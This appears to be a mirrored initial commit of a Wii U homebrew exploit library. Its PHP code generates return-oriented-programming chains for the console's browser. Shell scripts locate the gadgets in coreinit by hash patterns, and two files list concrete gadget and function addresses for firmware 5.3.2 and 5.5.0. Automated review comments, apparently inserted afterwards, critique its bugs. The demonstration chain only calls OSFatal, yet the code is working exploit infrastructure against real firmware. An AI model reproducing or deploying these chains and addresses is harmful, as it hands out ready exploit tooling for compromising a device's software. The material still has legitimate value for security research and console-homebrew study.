mirror of
https://github.com/wiiu-env/wiiuhaxx_common.git
synced 2024-12-18 12:11:50 +01:00
Initial commit.
426271972c
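--- a/README.md
+++ b/README.md
@@ -0,0 +1,6 @@
+This is a common codebase for generating ROP-chains/etc for Wii U exploits. This uses addresses auto-located from coreinit. Currently only binary ROP-chains are supported.
+
+You must specify the "sysver={val}" URL parameter for pages using this codebase, for selecting your Wii U system-version:
+* "532": 5.3.2
+* "550": 5.5.0
+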
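--- a/wiiu_browserhax_common.php
+++ b/wiiu_browserhax_common.php
@@ -0,0 +1,131 @@
+<?php
+
+if(!isset($sysver))$sysver = -1;
+
+if(isset($_REQUEST['sysver']))
+{
+if($_REQUEST['sysver']==="532")
+{
+$sysver = 532;
+}
+else if($_REQUEST['sysver']==="550")
+{
+$sysver = 550;
+}
+}
+
+if($sysver===-1)die("The system-version must be specified via an URL parameter.");
+
+require_once("wiiuhaxx_rop_sysver_$sysver.php");
+
+$ropchainselect = -1;
+if($ropchainselect == -1)
+{
+$ropchainselect = 1;
+}
+
+if(!isset($generatebinrop))$generatebinrop = 0;
+
+/*
+Documentation for the addrs loaded from the above:
+
+$ROP_POPJUMPLR_STACK12 Load LR from stackreg+12, add stackreg with 8, then jump to LR.
+$ROP_POPJUMPLR_STACK20 Add stackreg with 16, load LR from stackreg+4 then jump to LR.
+$ROP_CALLFUNC Call the code with the address stored in r27, with: r3=r29, r4=r31, r5=r25, r6=r24, r7=r28. Then once it returns from that code: r3=r29. Load r20..r31 from the data starting at stackreg+8. Load LR from stackreg+60, add stackreg with 56, then jump to LR.
+$ROP_CALLR28_POP_R28_TO_R31 Set r4 to r31, then call the code with the address stored in r28. Load r28..r31 from the data starting at stackreg+8. Load LR from stackreg+28. Add stackreg with 24, then jump to LR.
+$ROP_POP_R28R29R30R31 Load r28..r31 from the data starting at stackreg+8. Load LR from stackreg+28, add stackreg with 24, then jump to LR.
+$ROP_POP_R27 Load r27 from stackreg+12. Load LR from stackreg+36, add stackreg with 32, then jump to LR.
+$ROP_POP_R24_TO_R31 Load r24..r31 with the data starting at stackreg+16. Load LR from stackreg+52. Add stackreg with 48, then jump to LR.
+
+$ROP_memcpy Address of "memcpy" in coreinit.
+$ROP_DCFlushRange Address of "DCFlushRange" in coreinit. void DCFlushRange(const void *addr, size_t length);
+$ROP_ICInvalidateRange Address of "ICInvalidateRange" in coreinit. void ICInvalidateRange(const void *addr, size_t length);
+$ROP_OSSwitchSecCodeGenMode Address of "OSSwitchSecCodeGenMode" in coreinit. OSSwitchSecCodeGenMode(bool execute)
+$ROP_OSSetThreadAffinity Address of "OSSetThreadAffinity" in coreinit. OSSetThreadAffinity(OSThread* thread, u32 affinity)
+$ROP_OSYieldThread Address of "OSYieldThread" in coreinit. OSYieldThread(void)
+$ROP_OSFatal Address of "$ROP_OSFatal" in coreinit.
+*/
+
+function genu32_unicode($value)//This would need updated to support big-endian.
+{
+$hexstr = sprintf("%08x", $value);
+$outstr = "\u" . substr($hexstr, 4, 4) . "\u" . substr($hexstr, 0, 4);
+return $outstr;
+}
+function genu32_unicode_jswrap($value)
+{
+$str = "\"" . genu32_unicode($value) . "\"";
+return $str;
+}
+function ropchain_appendu32($val)
+{
+global $ROPCHAIN, $generatebinrop;
+if($generatebinrop==0)
+{
+$ROPCHAIN.= genu32_unicode($val);
+}
+else
+{
+$ROPCHAIN.= pack("N*", $val);
+}
+}
+
+function generate_ropchain()
+{
+global $ROPCHAIN, $generatebinrop, $ropchainselect;
+
+$ROPCHAIN = "";
+
+if($generatebinrop==0)$ROPCHAIN .= "\"";
+
+if($ropchainselect==1)
+{
+generateropchain_type1();
+}
+
+if($generatebinrop==0)$ROPCHAIN.= "\"";
+}
+
+function ropgen_pop_r24_to_r31($inputregs)
+{
+global $ROP_POP_R24_TO_R31;
+
+ropchain_appendu32($ROP_POP_R24_TO_R31);
+ropchain_appendu32(0x0);
+ropchain_appendu32(0x0);
+for($i=0; $i<(32-24); $i++)ropchain_appendu32($inputregs[$i]);
+ropchain_appendu32(0x0);
+}
+
+function ropgen_callfunc($funcaddr, $r3, $r4, $r5, $r6)
+{
+global $ROP_CALLR28_POP_R28_TO_R31, $ROP_CALLFUNC;
+
+$inputregs = array();
+$inputregs[24 - 24] = $r6;//r24 / r6
+$inputregs[25 - 24] = $r5;//r25 / r5
+$inputregs[26 - 24] = 0x0;//r26
+$inputregs[27 - 24] = $ROP_CALLR28_POP_R28_TO_R31;//r27
+$inputregs[28 - 24] = $funcaddr;//r28 / r7
+$inputregs[29 - 24] = $r3;//r29 / r3
+$inputregs[30 - 24] = 0x0;//r30
+$inputregs[31 - 24] = $r4;//r31 / r4
+
+ropgen_pop_r24_to_r31($inputregs);
+
+ropchain_appendu32($ROP_CALLFUNC);
+
+ropchain_appendu32(0x0);//r28
+ropchain_appendu32(0x0);//r29
+ropchain_appendu32(0x0);//r30
+ropchain_appendu32(0x0);//r31
+ropchain_appendu32(0x0);
+}
+
+function generateropchain_type1()
+{
+global $ROP_OSFatal;
+ropgen_callfunc($ROP_OSFatal, 0x14572D28, 0x0, 0x0, 0x0);//OSFatal(<data from the haxx>);
+}
+
+?>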
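Review bot: `$ropchainselect = -1;` immediately followed by `if($ropchainselect == -1)` is a no-op — the variable is unconditionally reset, so unlike `$sysver` and `$generatebinrop` it cannot be preselected by the including page before `require`; the guard presumably meant `if(!isset($ropchainselect))$ropchainselect = 1;`, mirroring the `$generatebinrop` line just below it. The documentation block also describes `$ROP_OSFatal` as the address of `"$ROP_OSFatal"` where the coreinit symbol (as emitted by `wiiuhaxx_locaterop.sh`) is `OSFatal`. Separately, `genu32_unicode()` assumes `$value` fits in 32 bits: `sprintf("%08x", ...)` on a larger or negative value yields more than eight hex digits, and the two fixed-offset `substr()` calls then emit the wrong halves; on 64-bit PHP a `$value & 0xFFFFFFFF` mask (or an explicit range check that fails loudly) would make the encoding total. `ropgen_pop_r24_to_r31()` likewise indexes `$inputregs[0..7]` without checking the array has eight entries, so a short array becomes a notice plus a silently zeroed register.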
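--- a/wiiuhaxx_buildropversions.sh
+++ b/wiiuhaxx_buildropversions.sh
@@ -0,0 +1,3 @@
+./wiiuhaxx_locaterop.sh $1/v11464 0x0101c400 > wiiuhaxx_rop_sysver_532.php
+./wiiuhaxx_locaterop.sh $1/v15702 0x0101c400 > wiiuhaxx_rop_sysver_550.php
+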
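Review bot: `$1` is used unquoted and unchecked on both lines, so running the script with no argument silently resolves the paths to `/v11464` and `/v15702`, and each `>` redirection truncates the existing `wiiuhaxx_rop_sysver_*.php` before `wiiuhaxx_locaterop.sh` has run, so a failing run leaves an empty or partial version file behind. Guard the argument and fail fast: `set -e` plus `: "${1:?usage: $0 <dir containing v11464 and v15702>}"` at the top, and quote `"$1"` in both invocations.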
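--- a/wiiuhaxx_locaterop.sh
+++ b/wiiuhaxx_locaterop.sh
@@ -0,0 +1,22 @@
+ospath=$1
+coreinit_textaddr=$2
+
+powerpc-eabi-objcopy --change-section-address .text=$coreinit_textaddr $ospath/coreinit.elf $ospath/coreinit_reloc.elf
+
+function getcoreinit_symboladdr
+{
+val=`powerpc-eabi-readelf -a $ospath/coreinit_reloc.elf | grep "$1" | head -n 1 | cut -d: -f2 | cut "-d " -f2`
+echo "$2 = 0x$val;"
+}
+
+echo "<?php"
+ropgadget_patternfinder $1/coreinit.elf --baseaddr=$coreinit_textaddr "--plainsuffix=;" --script=wiiuhaxx_locaterop_script
+echo ""
+getcoreinit_symboladdr "memcpy" "\$ROP_memcpy"
+getcoreinit_symboladdr "DCFlushRange" "\$ROP_DCFlushRange"
+getcoreinit_symboladdr "ICInvalidateRange" "\$ROP_ICInvalidateRange"
+getcoreinit_symboladdr "OSSwitchSecCodeGenMode" "\$ROP_OSSwitchSecCodeGenMode"
+getcoreinit_symboladdr "OSSetThreadAffinity" "\$ROP_OSSetThreadAffinity"
+getcoreinit_symboladdr "OSYieldThread" "\$ROP_OSYieldThread"
+getcoreinit_symboladdr "OSFatal" "\$ROP_OSFatal"
+echo "?>"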
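Review bot: `getcoreinit_symboladdr` never checks that the `readelf | grep | head | cut` pipeline produced a value: if `$1` does not match (or the toolchain is missing), `$val` is empty and the function still prints `$2 = 0x;`, so the generated `wiiuhaxx_rop_sysver_*.php` becomes a parse error in the consuming page rather than an error at build time. Add `[ -n "$val" ] || { echo "symbol $1 not found" >&2; exit 1; }` before the `echo`, and consider `set -e` at the top so a failed `objcopy` or `ropgadget_patternfinder` does not produce a half-written file. `grep "$1"` is also an unanchored substring match with `head -n 1` taking the first hit, so `memcpy` resolves to whichever symbol containing that text readelf lists first; matching the whole symbol column (e.g. `grep -w "$1"`) would be less fragile. `$ospath` and `$1` are expanded unquoted throughout, so a path with spaces breaks every command.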
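--- a/wiiuhaxx_locaterop_script
+++ b/wiiuhaxx_locaterop_script
@@ -0,0 +1,7 @@
+--patterntype=sha256 --patterndata=c87020ec5098d13edd3ee0d0d01313a0a5f0a7937f36c0f5f4e9503165ae33fb --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK12 = "
+--patterntype=sha256 --patterndata=decff3ca875efc1a9c3d0ac7618f3efa3d33ca59bd3fd602a747d3469bd5c000 --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK20 = "
+--patterntype=sha256 --patterndata=5306248821c072a9cf5c71c9469171e17cd2966f66fc7d612ce79cff8d5d124a --patternsha256size=0x34 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNC = "
+--patterntype=sha256 --patterndata=f4e76053a65c571f2b3b8c6c6dde973c95f889bccf0a22eb9649cbc7810c8e98 --patternsha256size=0x2c --addval=0xFFFFFCFC "--plainout=$ROP_CALLR28_POP_R28_TO_R31 = "
+--patterntype=sha256 --patterndata=4741b863adcf742f8928c485a39f3cc8629469d1ddccf9e68c9dd1c25341f091 --patternsha256size=0x20 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R28R29R30R31 = "
+--patterntype=sha256 --patterndata=972973be8074e92b0f10fc5fbbaaef6c28e2905f99007654cd735a5fd69933fc --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R27 = "
+--patterntype=sha256 --patterndata=6f5f11fdc441ddef8f2189cbc9006517c4917fcf6e975cb8cbeb2373bf8e8ca2 --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R24_TO_R31 = "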
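--- a/wiiuhaxx_rop_sysver_532.php
+++ b/wiiuhaxx_rop_sysver_532.php
@@ -0,0 +1,17 @@
+<?php
+$ROP_POPJUMPLR_STACK12 = 0x0101cd14;
+$ROP_POPJUMPLR_STACK20 = 0x01024d28;
+$ROP_CALLFUNC = 0x0107f82c;
+$ROP_CALLR28_POP_R28_TO_R31 = 0x0107d328;
+$ROP_POP_R28R29R30R31 = 0x0101d8c4;
+$ROP_POP_R27 = 0x0101caf0;
+$ROP_POP_R24_TO_R31 = 0x0102042c;
+
+$ROP_memcpy = 0x01035a68;
+$ROP_DCFlushRange = 0x01023ee8;
+$ROP_ICInvalidateRange = 0x01024010;
+$ROP_OSSwitchSecCodeGenMode = 0x010370c0;
+$ROP_OSSetThreadAffinity = 0x01042284;
+$ROP_OSYieldThread = 0x01041250;
+$ROP_OSFatal = 0x01031368;
+?>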
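--- a/wiiuhaxx_rop_sysver_550.php
+++ b/wiiuhaxx_rop_sysver_550.php
@@ -0,0 +1,17 @@
+<?php
+$ROP_POPJUMPLR_STACK12 = 0x0101cd24;
+$ROP_POPJUMPLR_STACK20 = 0x01024d88;
+$ROP_CALLFUNC = 0x01080274;
+$ROP_CALLR28_POP_R28_TO_R31 = 0x0107dd70;
+$ROP_POP_R28R29R30R31 = 0x0101d8d4;
+$ROP_POP_R27 = 0x0101cb00;
+$ROP_POP_R24_TO_R31 = 0x010204c8;
+
+$ROP_memcpy = 0x01035fc8;
+$ROP_DCFlushRange = 0x01023f88;
+$ROP_ICInvalidateRange = 0x010240b0;
+$ROP_OSSwitchSecCodeGenMode = 0x010376c0;
+$ROP_OSSetThreadAffinity = 0x010429dc;
+$ROP_OSYieldThread = 0x010418e4;
+$ROP_OSFatal = 0x01031618;
+?>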